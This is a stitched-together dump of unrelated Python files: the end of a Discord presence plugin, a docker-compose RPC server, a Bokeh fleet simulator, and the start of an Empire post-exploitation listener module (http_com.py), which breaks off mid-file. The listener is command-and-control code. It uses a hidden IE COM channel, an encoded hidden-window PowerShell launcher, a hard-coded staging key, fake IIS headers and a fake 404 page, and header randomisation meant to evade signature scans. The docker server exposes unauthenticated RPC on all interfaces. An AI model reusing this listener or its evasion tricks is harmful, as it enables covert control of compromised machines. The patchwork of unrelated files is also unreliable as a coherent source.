retry = True
while retry:
time.sleep(1 / 10)
try:
self.discordSdkInterface = dsdk.Discord(self.discordApplicationId, dsdk.CreateFlags.no_require_discord, self.plugin_path)
retry = False
except Exception:
pass
# make it do the thing
self.activity_manager = self.discordSdkInterface.get_activity_manager()
self.activity = dsdk.Activity()
self.call_back_thread = threading.Thread(target=self.run_callbacks)
self.call_back_thread.setDaemon(True)
self.call_back_thread.start()
# update discord-visible fields with their initial values
self.currentPresenceState = _("Connecting to game...")
self.currentPresenceDetails = _("{plugin_name} v{plugin_version}, by {plugin_author}").format(plugin_name=plugin_name,plugin_version=plugin_version,plugin_author=plugin_author)
self.currentPresenceTimestamp = time.time()
self.update_presence()
# keeps the SDK API alive, and if it's dead, restarts it
def run_callbacks(self):
try:
while True:
time.sleep(1 / 10)
self.discordSdkInterface.run_callbacks()
except Exception:
self.check_run(self.plugin_dir)
plugin = DiscordPresence()
def plugin_start3(plugin_dir):
return plugin.plugin_start3(plugin_dir)
def plugin_stop():
return plugin.plugin_stop()
def plugin_app(parent):
return plugin.plugin_app(parent)
def journal_entry(cmdr, is_beta, system, station, entry, state):
return plugin.journal_entry( cmdr, is_beta, system, station, entry, state )
|
main.py
|
from ..service import BuildAction
from ..service import ConvergenceStrategy
from ..service import parse_repository_tag
from ..service import Service
from .. import config
from ..config.environment import Environment
from ..config.environment import split_env
from ..config.config import ConfigDetails
from ..config.config import ConfigFile
from ..config.serialize import denormalize_config
from ..const import HTTP_TIMEOUT
from ..cli import errors
from ..project import Project
from ..utils import json_hash
from ..cli.main import image_digests_for_project
from tempfile import TemporaryDirectory
from docker.auth import resolve_repository_name
from docker import APIClient
from docker.tls import TLSConfig
from threading import Thread
from os import environ
from os import path
import yaml
import requests
import zerorpc
import re
# https://github.com/docker/docker-py/blob/469b12a3c59ec344b7aaeebde05512387f5488b3/docker/utils/utils.py#L409
def client_kwargs(host="", ssl_version=None, assert_hostname=None, environment=None):
params = {
"version": "1.21",
"user_agent": "docker-compose-api"
}
if not environment:
environment = environ
# empty string for cert path is the same as unset.
cert_path = environment.get("DOCKER_CERT_PATH") or None
# empty string for tls verify counts as "false".
# Any value or "unset" counts as true.
tls_verify = environment.get("DOCKER_TLS_VERIFY")
if tls_verify == "":
tls_verify = False
else:
tls_verify = tls_verify is not None
enable_tls = cert_path or tls_verify
timeout = environment.get("COMPOSE_HTTP_TIMEOUT") or environment.get("DOCKER_CLIENT_TIMEOUT")
if timeout:
params["timeout"] = int(timeout)
else:
params["timeout"] = HTTP_TIMEOUT
if host:
params["base_url"] = (
host.replace("tcp://", "https://") if enable_tls else host
)
if not enable_tls:
return params
if not cert_path:
cert_path = path.join(path.expanduser("~"), ".docker")
if not tls_verify and assert_hostname is None:
# assert_hostname is a subset of TLS verification,
# so if it's not set already then set it to false.
assert_hostname = False
params["tls"] = TLSConfig(
client_cert=(path.join(cert_path, "cert.pem"),
path.join(cert_path, "key.pem")),
ca_cert=path.join(cert_path, "ca.pem"),
verify=tls_verify,
ssl_version=ssl_version,
assert_hostname=assert_hostname,
)
return params
def get_client(host="", environment=None):
return APIClient(**client_kwargs(
host=host,
ssl_version=None,
assert_hostname=None,
environment=environment
))
def get_config_details(manifest="", env_files=None, environment=None):
return ConfigDetails(
TemporaryDirectory().name,
[ConfigFile(None, yaml.safe_load(manifest))],
env_files,
environment
)
def get_config_data(manifest="", env_files=None, environment=None):
config_details = get_config_details(manifest=manifest, env_files=env_files, environment=environment)
return config.load(config_details=config_details)
def get_project(project_name=None, host=None, config_data=None, environment=None):
client = get_client(
host=host,
environment=environment
)
with errors.handle_connection_errors(client):
return Project.from_config(name=project_name, config_data=config_data, client=client)
def run_in_thread(target=None, args=()):
thread = Thread(target=target, args=args)
thread.daemon = True
thread.start()
# v1
# https://registry.hub.docker.com/v1/repositories/nodered/node-red-docker/tags/latest
# https://{registry}/v1/repositories/{repo_name}/tags/{tag || latest}
def get_image_id_v1(registry="index.docker.io", repo_name=None, tag="latest"):
if tag == "":
tag = "latest"
r_id = requests.get("https://index.{}//v1/repositories/{}/tags/{}".format(registry, repo_name, tag))
return r_id.text
# v2
# token = $(curl -s "https://auth.docker.io/token?service=registry.docker.io&scope=repository:{repo_name}:pull" | jq -r .token)
# curl -L -s -D - -H "Authorization: Bearer {toekn}" -H "Accept: " https://index.docker.io/v2/{repo_name}/manifests/{tag || latest}
# Etag: "sha256:2502e8213d0ce2616591d87bdcb8cda7677b800e08034c888c8dfd6b2e890ac7"
def get_image_id_v2(registry="index.docker.io", repo_name=None, tag="latest"):
if tag == "":
tag = "latest"
if re.search(r"\/", repo_name) == None:
repo_name = "library/{}".format(repo_name)
r_token = requests.get("http://auth.{}/token?service=registry.{}&scope=repository:{}:pull".format(registry, registry, repo_name))
r_body = r_token.json()
r_id = requests.get("https://index.{}/v2/{}/manifests/{}".format(registry, repo_name, tag), headers={
"Authorization": "Bearer {}".format(r_body.get("token")),
"Accept": "application/vnd.docker.distribution.manifest.v2+json"
})
return r_id.json().get("config").get("digest")
def get_image_id(name):
repository, tag, separator = parse_repository_tag(repo_path=name)
registry, repo_name = resolve_repository_name(repo_name=repository)
ping = requests.get("http://index.{}/v2".format(registry))
Id = None
if ping.status_code == 404:
Id = get_image_id_v1(registry=registry, repo_name=repo_name, tag=tag)
else:
Id = get_image_id_v2(registry=registry, repo_name=repo_name, tag=tag)
return Id
def config_dict(service=None, image_id=""):
return {
"options": service.options,
"image_id": image_id,
"links": service.get_link_names(),
"net": service.network_mode.id,
"networks": service.networks,
"volumes_from": [
(v.source.name, v.mode)
for v in service.volumes_from if isinstance(v.source, Service)
]
}
def get_environment(options_env=""):
env = {}
if options_env is not None:
for line in options_env.splitlines():
line = line.strip()
if line and not line.startswith('#'):
k, v = split_env(line)
env[k] = v
environment = Environment(env);
environment.update(environ)
return environment
def get_host(options=None, environment=None):
return options.get("host") or environment.get("DOCKER_HOST")
class TopLevelCommand(object):
def ping(self):
return "Hello from docker-compose"
def config(self, options=None, manifest=""):
environment = get_environment(options_env=options.get("environment"))
config_data = get_config_data(manifest=manifest, env_files=options.get("files"), environment=environment)
image_digests = None
services = []
volumes = []
if options.get('resolve_image_digests'):
host = get_host(options=options, environment=environment)
image_digests = image_digests_for_project(get_project(
project_name=options.get("project_name"),
host=host,
config_data=config_data,
environment=environment
))
if options.get('quiet'):
return
if options.get('services'):
for service in config_data.services:
services.append(service['name'])
if options.get('volumes'):
for volume in config_data.volumes:
volumes.append(volume)
if options.get('services') or options.get('volumes'):
return {
"volumes": volumes,
"services": services
};
return denormalize_config(config=config_data, image_digests=image_digests)
def up(self, options=None, manifest=""):
environment = get_environment(options_env=options.get("environment"))
host = get_host(options=options, environment=environment)
config_data = get_config_data(manifest=manifest, env_files=options.get("files"), environment=environment)
project = get_project(
project_name=options.get("project_name"),
host=host,
config_data=config_data,
environment=environment
)
tree = {}
for service in project.get_services():
try:
image_id = service.image()["Id"]
except:
try:
image_id = get_image_id(name=service.options["image"])
except:
image_id = ""
meta = config_dict(service=service, image_id=image_id)
convergence_plan = service.convergence_plan()
plan = {
"action": convergence_plan.action,
"containers": []
}
for container in convergence_plan.containers:
plan["containers"].append({
"name": container.dictionary.get("Name"),
"id": container.dictionary.get("Id")
})
tree[service.name] = {
"plan": plan,
"hash": json_hash(obj=meta),
"meta": meta,
"dependencies": service.get_dependency_names(),
"links": service.get_linked_service_names(),
"volumes": service.get_volumes_from_names()
}
run_in_thread(target=project.up, args=(
[], # service_names
True, # start_deps
ConvergenceStrategy.changed, # strategy
BuildAction.none, # do_build
options.get("timeout"), # timeout
True, # detached
True # remove_orphans
))
return tree
def scale(self, options=None, manifest=""):
environment = get_environment(options_env=options.get("environment"))
host = get_host(options=options, environment=environment)
config_data = get_config_data(manifest=manifest, env_files=options.get("files"), environment=environment)
project = get_project(
project_name=options.get("project_name"),
host=host,
config_data=config_data,
environment=environment
)
def do(service=None, num=0):
service.scale(desired_num=num)
for service in options.get("services"):
run_in_thread(target=do, args=(
project.get_service(service.get("name")), # service_name
service.get("num"), # num
))
def main():
server = zerorpc.Server(TopLevelCommand())
server.bind("tcp://0.0.0.0:4242")
print("RPC Server listenting tcp://0.0.0.0:4242")
server.run()
|
simulator.py
|
from functools import partial
from bokeh.models import ColumnDataSource, Toggle, Slider, Div, Label
from threading import Thread
from bokeh.themes import built_in_themes
from bokeh.plotting import curdoc, figure
from bokeh.layouts import column, row
from tornado import gen
from bokeh.document import without_document_lock
from collections import defaultdict
from bokeh.tile_providers import get_provider, Vendors
from mod.env.fleet.HiredCar import HiredCar
from mod.env.fleet.Car import Car
from mod.env.fleet.CarStatus import CarStatus
import mod.env.visual as vi
import mod.env.network as nw
import numpy as np
from concurrent.futures import ThreadPoolExecutor
from pprint import pprint
from mod.env.config import FOLDER_OUTPUT
import os
class PlotTrack:
# Delay after each assignment (in seconds)
STEP_DELAY = 0
# Max alpha of value function spots
MAX_ALPHA_VALUE_FUNCTION = 0.3
CAR_FILL_ALPHA = 0.5
# Size of car glyph
CAR_SIZE = 8
PLOT_STEP = 0
OPT_STEP = 1
PLOT_EPISODE = 2
REGION_CENTER_LINE_WIDHT = 1
REGION_CENTER_LINE_ALPHA = 0.3
# Number of coordinates composing the car paths within a step
SHOW_SP_LINES = False
SHOW_LINES = True
N_POINTS = 5
FRAME_UPDATE_DELAY = 1
def update_label_text(self, main_fleet, secondary_fleet, trips):
pass
def __init__(self, config):
self.config = config
self.output_path = FOLDER_OUTPUT + config.label
self.output_folder_simulation = self.output_path + "/simulation/"
# Creating folder to save partial info
if not os.path.exists(self.output_folder_simulation):
os.makedirs(self.output_folder_simulation)
self.path_region_center_data = (
self.output_folder_simulation + "region_center_data.npy"
)
# Save previously loaded vfs
self.vf_values = dict()
# ------------------------------------------------------------ #
# Slide steps ahead ########################################## #
# ------------------------------------------------------------ #
self.steps_ahead = 0
self.slide_alpha = Slider(
title="Opacity lines",
start=0,
end=1,
value=0.2,
step=0.05,
width=150,
)
self.fleet_stats = dict()
self.decisions = dict()
self.stats = Div(text="", align="center")
self.all_points = dict(x=[], y=[])
# This is important! Save curdoc() to make sure all threads
# see the same document.
self.doc = curdoc()
self.doc.theme = "caliber"
self.doc.title = "Simulation"
# All lines (alpha control)
self.center_lines = []
# create a plot and style its properties
self.p = figure(
title="Simulation",
x_axis_type="mercator",
y_axis_type="mercator",
plot_height=800,
plot_width=1000,
border_fill_color="white",
background_fill_color="white",
)
self.p.title.text_font_size = "25px"
self.p.title.align = "center"
self.p.add_tile(get_provider(Vendors.CARTODBPOSITRON_RETINA))
self.plot_step = 0
self.plot_episode = 0
self.opt_step = 0
self.opt_episode = 0
self.env = None
self.trips_dict = dict()
self.step_car_path_dict = defaultdict(lambda: defaultdict(dict))
source_point_value = ColumnDataSource(
data=dict(x=[], y=[], fill_alpha=[])
)
# -------------------------------------------------------------------- #
# Value function point style ######################################### #
# -------------------------------------------------------------------- #
self.value_function = self.p.circle(
x="x",
y="y",
size=30,
color="purple",
fill_alpha="fill_alpha",
line_width=0,
muted_alpha=0.0,
legend="Value function",
source=source_point_value,
)
self.source = {
CarStatus.REBALANCE: self.p.triangle(
x=[],
y=[],
size=PlotTrack.CAR_SIZE,
color=self.config.color_fleet_status[CarStatus.REBALANCE],
fill_alpha=PlotTrack.CAR_FILL_ALPHA,
line_width=0,
muted_alpha=0.0,
legend=Car.status_label_dict[CarStatus.REBALANCE],
),
CarStatus.RETURN: self.p.triangle(
x=[],
y=[],
size=PlotTrack.CAR_SIZE,
color=self.config.color_fleet_status[CarStatus.RETURN],
fill_alpha=PlotTrack.CAR_FILL_ALPHA,
line_width=0,
muted_alpha=0.0,
legend=Car.status_label_dict[CarStatus.RETURN],
),
CarStatus.ASSIGN: self.p.triangle(
x=[],
y=[],
size=PlotTrack.CAR_SIZE,
color=self.config.color_fleet_status[CarStatus.ASSIGN],
fill_alpha=PlotTrack.CAR_FILL_ALPHA,
line_width=0,
muted_alpha=0.0,
legend=Car.status_label_dict[CarStatus.ASSIGN],
),
CarStatus.CRUISING: self.p.triangle(
x=[],
y=[],
size=PlotTrack.CAR_SIZE,
# color=self.config.color_fleet_status[CarStatus.CRUISING],
line_color=self.config.color_fleet_status[CarStatus.ASSIGN],
fill_alpha=0.0,
line_width=0.5,
muted_alpha=0.0,
legend=Car.status_label_dict[CarStatus.CRUISING],
),
CarStatus.IDLE: self.p.triangle(
x=[],
y=[],
size=PlotTrack.CAR_SIZE,
# color="navy",
fill_alpha=0.0,
line_width=0.5,
line_color=self.config.color_fleet_status[CarStatus.IDLE],
muted_alpha=0.0,
legend=Car.status_label_dict[CarStatus.IDLE],
),
CarStatus.RECHARGING: self.p.triangle(
x=[],
y=[],
size=PlotTrack.CAR_SIZE,
color=self.config.color_fleet_status[CarStatus.RECHARGING],
line_width=0,
fill_alpha=PlotTrack.CAR_FILL_ALPHA,
muted_alpha=0.0,
legend=Car.status_label_dict[CarStatus.RECHARGING],
),
"o": self.p.circle(
x=[],
y=[],
size=15,
color="green",
fill_alpha=0.3,
line_width=0,
muted_alpha=0.0,
legend="Origins",
),
"d": self.p.circle(
x=[],
y=[],
size=15,
color="firebrick",
fill_alpha=0.3,
line_width=0,
muted_alpha=0.0,
legend="Destinations",
),
}
self.slide_alpha.on_change("value", self.update_line_alpha_centers)
self.slide_time_ahead = Slider(
title="Time step", start=1, end=15, value=1, step=1, width=150
)
self.slide_time_ahead.on_change("value", self.update_time_ahead)
self.slide_battery_level = Slider(
title="Battery level", start=0, end=1, value=0, step=1, width=150
)
self.slide_battery_level.on_change("value", self.update_time_ahead)
self.slide_agg_level = Slider(
title="Aggregation level",
start=0,
end=10,
value=0,
step=1,
width=150,
)
self.slide_agg_level.on_change("value", self.update_time_ahead)
def set_env(self, env):
self.env = env
self.slide_agg_level.end = env.config.n_aggregation_levels
self.slide_time_ahead.end = env.config.time_steps
self.slide_battery_level.end = env.config.battery_levels
@gen.coroutine
@without_document_lock
def update_line_alpha_centers(self, attrname, old, new):
# global run_plot
for c_lines in self.center_lines:
c_lines.glyph.line_alpha = self.slide_alpha.value
def config_figure(self):
self.p.legend.click_policy = "mute"
self.p.legend.location = "bottom_right"
# p.outline_line_color = None
@gen.coroutine
def update_plot_frame(self):
if self.plot_step in self.trips_dict:
# Plot all trips
for od, trips in self.trips_dict[self.plot_step].items():
self.source[od].data_source.data = trips
# print("###############", self.plot_step, "<", self.opt_step)
# pprint(self.step_car_path_dict)
if (
self.plot_step < self.opt_step
and self.plot_step in self.step_car_path_dict
):
status_movements, next_step = vi.get_next_frame(
self.step_car_path_dict, self.plot_step
)
# Update the car paths in all car statuses (i.e., rebalancing,
# parked, picking up user and recharging)
for status in CarStatus:
car_paths_xy = status_movements.get(status, dict(x=[], y=[]))
self.source[status].data_source.data = car_paths_xy
if next_step > self.plot_step:
# Trips are created in step n, and vehicles are scheduled in
# step n + 1
# try:
# del trips_dict[current_plot_step-1]
# except:
# pass
# Update plot title
self.plot_step = next_step
# Updating title
current_time = self.config.get_time(
self.plot_step, format="%I:%M %p"
)
self.p.title.text = (
# f"Iteration: {self.plot_episode:>5} - "
f"Time: {current_time} - "
f"Step: {self.plot_step:>5}/{self.config.time_steps:>5}"
)
# Stats
self.stats.text = self.get_fleet_stats(self.plot_step)
# Update attribute value functions
# self.update_value_function(
# self.plot_step,
# self.slide_battery_level.value,
# self.slide_agg_level.value
# )
@gen.coroutine
def update_attribute(self, attribute, value, param):
if param:
attribute.data_source.data[param] = value
else:
attribute.data_source.data = value
def update_screen(self, attribute=None, value=None, param=None):
# Updating alpha values
self.doc.add_next_tick_callback(
partial(
self.update_attribute,
attribute=attribute,
value=value,
param=param,
)
)
@gen.coroutine
@without_document_lock
def update_value_function(self, steps_ahead, battery_level, agg_level):
"""Update the alpha of all value function spots considering a number
of steps ahead the current time step.
Parameters
----------
source_point_value: point data
Source of value function data (alphas are "updated")
amod : Environment
Environment where value functions and points are saved.
steps_ahead : int
Number of steps ahead value functions should be shown.
battery_level : int
Show value functions corresponding to a battery level.
agg_level : int
Values correspond to aggregation level
"""
# Number of steps ahead value functions are visualized
future_step = steps_ahead
print("Calculating value functions...")
if future_step in self.vf_values:
values = self.vf_values[future_step]
else:
# Value function of all points
values = np.zeros(len(self.env.points))
# Get all valid value function throughout the map at a certain level
for point in self.env.points_level[self.env.config.centroid_level]:
# Value function corresponds to position and battery level,
# i.e., how valuable is to have a vehicle at position p with
# a certain battery level
attribute = (
future_step,
point.id,
Car.DISCARD_BATTERY,
Car.INFINITE_CONTRACT_DURATION,
Car.TYPE_FLEET,
Car.COMPANY_OWNED_ORIGIN,
)
# TIME = 0
# LOCATION = 1
# BATTERY = 2
# CONTRACT = 3
# CARTYPE = 4
# ORIGIN = 5
# Checking whether value function was defined
# if (
# future_step in self.env.values
# and agg_level in self.env.values[future_step]
# and attribute in self.env.values[future_step][agg_level]
# ):
# id_g = point.id_level(agg_level)
estimate = self.env.adp.get_weighted_value(attribute)
values[point.id] = estimate
# self.env.values[future_step][agg_level][attribute]
# Total value function throughout all points
total = np.sum(values)
if total > 0:
# Values are between 0 and 1
values = values / np.sum(values)
# Values are normalized
values = (values - np.min(values)) / (
np.max(values) - np.min(values)
)
# Resize alpha factor
values = PlotTrack.MAX_ALPHA_VALUE_FUNCTION * values
print("Finished calculating...")
self.vf_values[future_step] = values
self.update_screen(
attribute=self.value_function, value=values, param="fill_alpha"
)
def create_value_function_points(self, points):
self.value_function.data_source.data = {
**{"fill_alpha": np.zeros(len(points["x"]))},
**points,
}
def create_regular_points(self, points):
point_regular = self.p.circle(
x=[],
y=[],
size=2,
color="firebrick",
fill_alpha=0.5,
line_width=0,
legend="Intersection",
muted_alpha=0,
)
point_regular.data_source.data = points
self.all_points = points
def get_region_center_toggle(
self, lines_xy, i_level, level, level_demand, level_fleet, centers
):
active = False
region_fleet = ""
region_demand = ""
if level == level_demand:
region_demand = " [D] "
active = True
if level == level_fleet:
region_fleet = "[F] "
active = True
lines_level_glyph = self.p.multi_line(
[],
[],
line_color="firebrick",
line_alpha=PlotTrack.REGION_CENTER_LINE_ALPHA,
line_width=PlotTrack.REGION_CENTER_LINE_WIDHT,
muted_alpha=0.00,
visible=active,
)
self.center_lines.append(lines_level_glyph)
point_centers = self.p.circle(
x=[],
y=[],
size=6,
color="white",
line_width=1,
line_color="firebrick",
visible=active,
)
point_centers.data_source.data = centers
lines_level_glyph.data_source.data = lines_xy[level]
toggle = Toggle(
label=(
f"Level {i_level:>2} ({level:>3}s)"
f"{region_demand + region_fleet:>7}"
),
active=active,
width=150,
)
toggle.js_link("active", lines_level_glyph, "visible")
toggle.js_link("active", point_centers, "visible")
return toggle
@staticmethod
def default_to_regular(d):
if isinstance(d, defaultdict):
d = {k: PlotTrack.default_to_regular(v) for k, v in d.items()}
return d
def get_fleet_stats(self, step):
# text = "<h4>### FLEET STATS </h4>"
text = "<table>"
for fleet_type, status_count in self.fleet_stats[step].items():
text += f"<tr><td style='font-size:16px;text-align:right'><b>{fleet_type}</b></td>"
for status, count in status_count.items():
text += (
f"<td style='text-align:right'>"
f"<b>{status}:</b>"
"</td><td style='width:15px'>"
f"{count}"
"<td>"
)
text += "</tr>"
text += "</table>"
# text = "<h4>### FLEET STATS </h4>"
text += "<table><tr>"
for decision, count in self.decisions[step].items():
text += (
f"<td style='text-align:right'><b>{decision}:</b>"
"</td><td style='width:15px'>"
f"{count}"
"<td>"
)
text += "</tr> </table>"
return text
@gen.coroutine
@without_document_lock
def update_first(self, lines, level_centers, level_demand, level_fleet):
print("Drawing centers...")
column_elements = []
toggles = defaultdict(list)
i = -1
for level, centers in level_centers.items():
i += 1
# Level 0 corresponds to regular intersections
if level == 0:
self.create_regular_points(centers)
self.create_value_function_points(centers)
continue
# Line types = Direct lines or Shortest Path lines, from
# centers to elements.
# Lines xy = Dicitionary of line coordinates, for example,
# {x=[[x1, x2], [x1, x3]], y=[[y1, y2], [y1, y3]]}
for line_type, lines_xy in lines.items():
toggle = self.get_region_center_toggle(
lines_xy, i, level, level_demand, level_fleet, centers
)
toggles[line_type].append(toggle)
# Add all toggles to column
for line_type in lines:
# Title before region center toggles
line_type_title = Div(
text=f"<h3>{line_type} lines</h3>", width=150
)
column_elements.append(line_type_title)
# Toggles
column_elements.extend(toggles[line_type])
column_elements.append(self.slide_alpha)
column_elements.append(self.slide_time_ahead)
column_elements.append(self.slide_battery_level)
column_elements.append(self.slide_agg_level)
title = Div(
text=(f"<h1>{self.env.config.region}</h1>"), align="center"
)
network_info = Div(
text=(
f"<h2>{self.env.config.node_count} nodes & "
f"{self.env.config.edge_count} edges</h2>"
),
align="center",
)
center_count = Div(
text=(
" - ".join(
[
f"<b>{dist}</b>({count})"
for dist, count in self.env.config.center_count_dict.items()
]
)
)
)
self.doc.add_root(
column(
title,
network_info,
self.stats,
row(column(*column_elements), self.p),
center_count,
)
)
self.config_figure()
print("Centers, toggles, and slides created.")
def plot_centers(
self,
points,
levels,
level_demand,
level_fleet,
show_sp_lines=True,
show_lines=True,
path_center_data=None,
):
try:
print("\nReading center data...")
center_lines_dict = np.load(
self.path_region_center_data, allow_pickle=True
).item()
centers_xy = center_lines_dict["centers_xy"]
lines_xy = center_lines_dict["lines_xy"]
print("Center data loaded successfully.")
# Centers were not previously saved
except Exception as e:
print(
f"\nFailed reading center data. Exception: {e} "
"\nPulling center data from server..."
)
centers_xy, lines_xy = vi.get_center_elements(
points, levels, sp_lines=show_sp_lines, direct_lines=show_lines
)
print("Saving center data...")
np.save(
self.path_region_center_data,
{
"centers_xy": PlotTrack.default_to_regular(centers_xy),
"lines_xy": PlotTrack.default_to_regular(lines_xy),
},
)
print(f"Center data saved at '{self.path_region_center_data}'")
self.doc.add_next_tick_callback(
partial(
self.update_first,
lines=lines_xy,
level_centers=centers_xy,
level_fleet=level_fleet,
level_demand=level_demand,
)
)
print("Finished plotting centers.")
@gen.coroutine
def update_time_ahead(self, attrname, old, new):
steps_ahead = self.slide_time_ahead.value
battery_level = self.slide_battery_level.value
agg_level = self.slide_agg_level.value
print("Changing value function", steps_ahead, battery_level, agg_level)
self.update_value_function(steps_ahead, battery_level, agg_level)
def multithreading(self, func, args, workers):
with ThreadPoolExecutor(workers) as ex:
res = ex.map(func, args)
return list(res)
def compute_movements(self, step):
self.fleet_stats[step] = self.env.get_fleet_stats()
self.decisions[step] = self.env.decision_dict
fleet = self.env.cars
# If working with hired vehicles, only compute movements from those
# which started working, i.e., hired.
try:
active_hired = [
car for car in self.env.hired_cars if not car.started_contract
]
fleet += active_hired
except:
pass
# Get car paths
for car in fleet:
# if car.status == CarStatus.IDLE:
# continue
# Car path was stored in previous step since its route
# covers more than one time step
if car.id not in self.step_car_path_dict[step]:
# segmented_sp = nw.query_segmented_sp(
# c.previous,
# c.point,
# n_points,
# step_duration,
# projection="MERCATOR",
# waypoint=c.waypoint,
# )
if car.previous == car.point:
segmented_sp = [[[car.point.x, car.point.y]]]
# Vehicle is moving
else:
# TODO should be current time?
dif = (car.step - car.previous_step) * 5
# dif = dif * 10
segmented_sp = nw.query_sp_sliced(
car.previous,
car.point,
PlotTrack.N_POINTS * dif,
dif,
projection="MERCATOR",
waypoint=car.waypoint,
)
# if segmented_sp[0]:
# print(f'{c.id} - INSERT TW: ({c.previous_arrival},{c.arrival_time}) Segmented SP: {len(segmented_sp)}')
# print("S:", c.previous, c.point)
# Update car movement in step
for i, s in enumerate(segmented_sp):
if not s:
print(
f"NOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO TYPE: {car.type} - STATUS: {car.status} - dif:{dif} - arrival:{car.arrival_time}/previous:{car.previous_arrival}- Segmented: {segmented_sp}"
)
self.step_car_path_dict[step + i][car.id] = (car.status, s)
# else:
# print(
# # f"Segmented: {[len(s) for status, s in movement_step_fleet_dict[step]]}."
# f"\n################ {c} ##############################"
# f"\n- Status: {c.status} "
# f"\n- Previous arrival: {c.previous_arrival} "
# f"\n- Arrival: {c.arrival_time} "
# f"\n- Step: {c.step}/{step} "
# )
# def get_next_frame(self, step):
# if step in self.step_car_path_dict and self.step_car_path_dict[step]:
# xy_status = defaultdict(lambda: dict(x=[], y=[]))
# count_finished = 0
# for status, path_car in self.step_car_path_dict[step].values():
# if len(path_car) > 1:
# x, y = path_car.pop(0)
# xy_status[status]["x"].append(x)
# xy_status[status]["y"].append(y)
# # Does not erase last position visited by car
# # When number of coordinates vary, it is desirible that
# # cars that have already travelled their paths wait in
# # the last position they visited.
# elif len(path_car) == 1:
# x, y = path_car[0]
# count_finished += 1
# xy_status[status]["x"].append(x)
# xy_status[status]["y"].append(y)
# else:
# print(step)
# # pprint(self.step_car_path_dict)
# # pprint(self.step_car_path_dict[step])
# # pass
# # TODO Sometimes path_car[0] does no exist. This
# # cannot happen since coordinates are popped when
# # there are more than 2 elements.
# # Multithreading? path_car was not populated
# # correctly in the first place?
# if count_finished == len(self.step_car_path_dict[step].keys()):
# return xy_status, step + 1
# else:
# return xy_status, step
# ################################################################ #
# START ########################################################## #
# ################################################################ #
def start_animation(self, opt_method):
"""Start animation using opt_method as a base.
In opt_method, movements are computed and passed to simulator.
Parameters
----------
opt_method : def
Function where optimization takes place.
"""
thread = Thread(
target=partial(opt_method, plot_track=self, config=self.config)
)
thread.start()
self.doc.add_periodic_callback(
self.update_plot_frame, PlotTrack.FRAME_UPDATE_DELAY
)
|
http_com.py
|
import logging
import base64
import random
import os
import ssl
import time
import copy
import json
import sys
from pydispatch import dispatcher
from flask import Flask, request, make_response, send_from_directory
# Empire imports
from lib.common import helpers
from lib.common import agents
from lib.common import encryption
from lib.common import packets
from lib.common import messages
class Listener:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'HTTP[S] COM',
'Author': ['@harmj0y'],
'Description': ('Starts a http[s] listener (PowerShell only) that uses a GET/POST approach '
'using a hidden Internet Explorer COM object. If using HTTPS, valid certificate required.'),
'Category' : ('client_server'),
'Comments': []
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Name' : {
'Description' : 'Name for the listener.',
'Required' : True,
'Value' : 'http_com'
},
'Host' : {
'Description' : 'Hostname/IP for staging.',
'Required' : True,
'Value' : "http://%s" % (helpers.lhost())
},
'BindIP' : {
'Description' : 'The IP to bind to on the control server.',
'Required' : True,
'Value' : '0.0.0.0'
},
'Port' : {
'Description' : 'Port for the listener.',
'Required' : True,
'Value' : ''
},
'Launcher' : {
'Description' : 'Launcher string.',
'Required' : True,
'Value' : 'powershell -noP -sta -w 1 -enc '
},
'StagingKey' : {
'Description' : 'Staging key for initial agent negotiation.',
'Required' : True,
'Value' : '2c103f2c4ed1e59c0b4e2e01821770fa'
},
'DefaultDelay' : {
'Description' : 'Agent delay/reach back interval (in seconds).',
'Required' : True,
'Value' : 5
},
'DefaultJitter' : {
'Description' : 'Jitter in agent reachback interval (0.0-1.0).',
'Required' : True,
'Value' : 0.0
},
'DefaultLostLimit' : {
'Description' : 'Number of missed checkins before exiting',
'Required' : True,
'Value' : 60
},
'DefaultProfile' : {
'Description' : 'Default communication profile for the agent.',
'Required' : True,
'Value' : "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
},
'CertPath' : {
'Description' : 'Certificate path for https listeners.',
'Required' : False,
'Value' : ''
},
'KillDate' : {
'Description' : 'Date for the listener to exit (MM/dd/yyyy).',
'Required' : False,
'Value' : ''
},
'WorkingHours' : {
'Description' : 'Hours for the agent to operate (09:00-17:00).',
'Required' : False,
'Value' : ''
},
'RequestHeader' : {
'Description' : 'Cannot use Cookie header, choose a different HTTP request header for comms.',
'Required' : True,
'Value' : 'CF-RAY'
},
'Headers' : {
'Description' : 'Headers for the control server.',
'Required' : True,
'Value' : 'Server:Microsoft-IIS/7.5'
},
'SlackToken' : {
'Description' : 'Your SlackBot API token to communicate with your Slack instance.',
'Required' : False,
'Value' : ''
},
'SlackChannel' : {
'Description' : 'The Slack channel or DM that notifications will be sent to.',
'Required' : False,
'Value' : '#general'
}
}
# required:
self.mainMenu = mainMenu
self.threads = {}
# optional/specific for this module
self.app = None
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
# set the default staging key to the controller db default
self.options['StagingKey']['Value'] = str(helpers.get_config('staging_key')[0])
# randomize the length of the default_response and index_page headers to evade signature based scans
self.header_offset = random.randint(0,64)
def default_response(self):
"""
Returns an IIS 7.5 404 not found page.
"""
return '\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>',
'<title>404 - File or directory not found.</title>',
'<style type="text/css">',
'<!--',
'body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}',
'fieldset{padding:0 15px 10px 15px;}',
'h1{font-size:2.4em;margin:0;color:#FFF;}',
'h2{font-size:1.7em;margin:0;color:#CC0000;}',
'h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}',
'#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;',
'background-color:#555555;}',
'#content{margin:0 0 0 2%;position:relative;}',
'.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="header"><h1>Server Error</h1></div>',
'<div id="content">',
' <div class="content-container"><fieldset>',
' <h2>404 - File or directory not found.</h2>',
